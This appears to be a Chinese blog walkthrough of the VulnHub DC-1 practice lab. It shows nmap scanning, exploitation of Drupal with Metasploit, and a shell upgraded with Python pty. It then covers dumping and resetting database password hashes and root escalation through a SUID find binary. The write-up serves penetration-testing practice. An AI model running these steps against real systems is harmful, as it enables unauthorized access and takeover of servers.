DC-1详解

于 2023-05-31 17:03:52 发布
阅读量213 收藏
点赞数
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76648294/article/details/130968610
版权

1.配置环境

 将靶机和攻击机网络适配器均设置为NAT模式,开启靶机。

2.扫描对应网段

nmap 192.168.131.0/24

  3.收集站点相关信息

观察几个端口对应的站点,对比发现192.168.131.130比较特别。访问站点。

 

 推测cms类型是drupal

4.使用msfconsole

 search drupal

 选出两个带有网站特征的模块,根据rank选择出最有可能成功的模块(即选择excell:优秀的)

装载模块:use2

 提示未设置完整

show options

 仅需设置rhosts(攻击地址)即可

set RHOSTS 192.168.131.130

run  

5.输入shell获取命令执行窗口

获取命令执行窗口成功!尝试执行命令

为了方便之后的提权命令正常执行,我们利用python转换shell为交互式

python -c "import pty;pty.spawn('/bin/bash')"

 ls -al:查看目录文件及其权限。

 发现flag1,cat即可

 提示:每个完美的cms都需要一个配置文件,你也一样。

搜一下drupal的配置文件:

 尝试直接cat,找不到文件

我们就直接用find寻找具体路径

 打开之后:开头就是flag2

 提示:暴力拆解不是获得权限的唯一方式,你还有什么方式?

同时我们还获得了数据库的密码,猜测下一个flag在数据库中

6.登录MySQL

 show databases;

 

show tables from drupaldb;

推测在users表中。show columns from drupaldb.user;

select group_concat(name,pass)from drupaldb.users;

 也不知道它是怎么加密的

就想着怎么改密码了

使用php scripts/password-hash.sh taikula加密泰裤辣

 记住这段哈希值

咱们改密码,即更新数据库。

改完了咱们就上号吧!

 

 特殊的PERMS将帮助寻找密码,但是你需要—exec类似命令取得到在暗处的东西

前一句话的意思是特别的特征。flag有什么特别特征呢,有flag呗。

find / -name "flag*"

 cat /home/flag4/flag4.txt

 你能在root权限下找flag吗,不过这应该很难吧。

结合flag3和2的提示,不爆破root密码,和find命令有关。又是执行进程时的命令

推测用suid提权

找找啥命令能suid提权

find / -user root -perm -4000 -print 2>/dev/null

 看到find跟看到家人一样

咱们利用find特性。先创建一个文件touch ikun

find / -name ikun

whoami 看看webs hell什么权限

 提权成功!

 cd /root到root目录看看

发现最后的flag。cat即可

4_6_6_15
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DC-1渗透靶机详解
weixin_51083551的博客
07-18 2846
萌新DC系列靶机渗透详解DC-1 在渗透测试之前,有自己的渗透思路 1. 明确目标 我们的目标应该是找齐里面所有的 flag 根据每个 flag 的提示找到下一个 flag 2. 信息收集 使用扫描工具寻找目标ip,在同一个网段下使用 arp-scan 扫描即可 └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:f2:1a:d5, IPv4: 192.168.0.111 Starting arp-scan 1.9.7 with 256
DC-1实战手把手教详解
逆旅行人的博客
09-04 3185
DC-1 是一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 它旨在为初学者带来挑战,但它的简单程度取决于您的技能和知识以及您的学习能力。 要成功完成这一挑战,您将需要 Linux 技能、熟悉 Linux 命令行以及使用基本渗透测试工具的经验,例如可以在 Kali Linux 或 Parrot Security OS 上找到的工具。 有多种获得 root 的方法,但是,我已经包含了一些包含初学者线索的标志。 总共有五个标志,但最终目标是在 root 的主目录中找到并读取标志。您甚至不需要
DC-1详解(绝对的详细!)
学习!冲冲冲!
10-23 9068
DC-1靶机整个渗透过程(B站可以看小飞侠的视频真的好!) 将kali和DC-1的网络均设置为NAT模式 获取kali的IP地址 ifconfig 查看IP命令需要记住 扫描此IP段中存活的靶机IP arp-scan -l 根据靶机MAC地址来确认其IP地址 用masscan快速扫描DC-1开放的端口 masscan --rate10000 -p 1-65535 192.168.220.131 --rate10000 用来定义扫描速率 -p 1-65535 定义扫描从1-6553
靶机2 DC-1(过程超详细)
最新发布
honest_gg的博客
09-09 1458
本靶机通过使用msf来getshell,然后进行mysql数据库的查询、更新,最后完成suid提权获取最终的flag
DC-1靶场搭建及渗透实战详细过程
baijiaofei的博客
08-24 1584
DC靶场实战过程
DC-1靶场实战详解
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
DC-DC变换电路详解
04-12
非常详细的介绍了升降压的过程,以及计算公式,常用的斩波电路等
降压式DC-DC参数详解.pdf
04-09
自己写的,适合做过但是不是很清楚的人群
dc-dc原理详解
04-18
### DC-DC转换器原理详解 #### 一、DC-DC转换器概述 DC-DC(Direct Current to Direct Current)转换器是一种常见的电力电子设备,主要用于调节直流电源的电压值,实现高压到低压或低压到高压的有效转换。与线性...
LDO与DC-DC器件的差异详解
08-26
**LDO(低压降线性稳压器)与DC-DC转换器的差异详解** LDO,即低压降线性稳压器,是一种常见的电源管理器件,主要用于将输入电压转换为稳定输出电压,以满足电路中不同部分的需求。LDO的特点在于其低压降特性,即在...
dc-ac_dc-ac_altium_
09-29
DC-AC逆变技术与Altium Designer应用详解》 在电力电子领域,DC-AC逆变技术是一项至关重要的技术,它将直流电转换为交流电,广泛应用于太阳能发电、电动汽车充电、UPS电源系统以及家电产品等领域。而Altium ...
DC-1靶场搭建及渗透实战详细过程(DC靶场系列)
热门推荐
金 帛的博客
06-29 1万+
DC-1靶场渗透过程,写的有点多,把许多方法尽可能地列出来了,也参考了很多别的文章,希望对刚学习web渗透的小白有所帮助吧!
[网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-20 4599
引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
DC系列靶机DC-1
weixin_53067829的博客
07-01 980
DC系列靶机
渗透测试靶机:DC-1
prettyX的博客
11-27 6643
GoGoGO!!! 这篇文章是看着大佬的文章,跟着复现,学习思路。一共5个flag,全部找到。 1、靶机名字:DC-1,很好找,这里不放链接了。 : ) 2、靶机下载后,我一开始是用VMware Workstation导入的.ova,然后Kali下想扫出DC-1的IP,扫不出来,看了文章的评论,然后安装VirtualBox,导入.ova(说实话,第一次用VirtualBox)。 ...
渗透测试学习之靶机DC-1
xdbzdgx的博客
11-05 2767
1.下载安装靶机 下载链接为DC: 1 ~ VulnHub,里面有三种下载方式任选一种即可,下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,依照指示重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。 注意,这里建议把DC-1靶机的网络链接模式改为NAT模式。 本文使用的攻击机为kali(安装在VMwa.
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2514
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
Dc-1靶机简单拿shell find提权
weixin_52263461的博客
12-09 340
Dc-1 msf 方法 nmap -sn192.168.0.1/24 扫描C段下局域网IP (Oracle VirtualBox virtual NIC) 代表的是靶机IP nmap -A 192.168.0.160 扫描靶机IP详细信息 可以发现drupal漏洞 3 使用msfconsole 工具 4 使用第四个模块 把yes的三个选项改掉 set RHOSTS 目标IP set TARGETURI drupal show options
【Vulnhub靶机渗透测试】之DC-1 (SUID提权)
Pluto.的博客
12-27 806
文章目录Vulnhub靶机渗透测试DC-11. 信息收集2. 漏洞利用 Vulnhub靶机渗透测试 DC-1 环境搭建 靶机镜像下载地址:https://www.vulnhub.com/entry/dc-1,292/; 需要将靶机和kali攻击机放在同一个局域网里; kali的IP地址:192.168.40.131。 1. 信息收集 使用 nmap 扫描 192.168.40.0/24 网段存活主机 nmap -sP 192.168.40.0/24 简单分析可知,靶机ip为 192
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值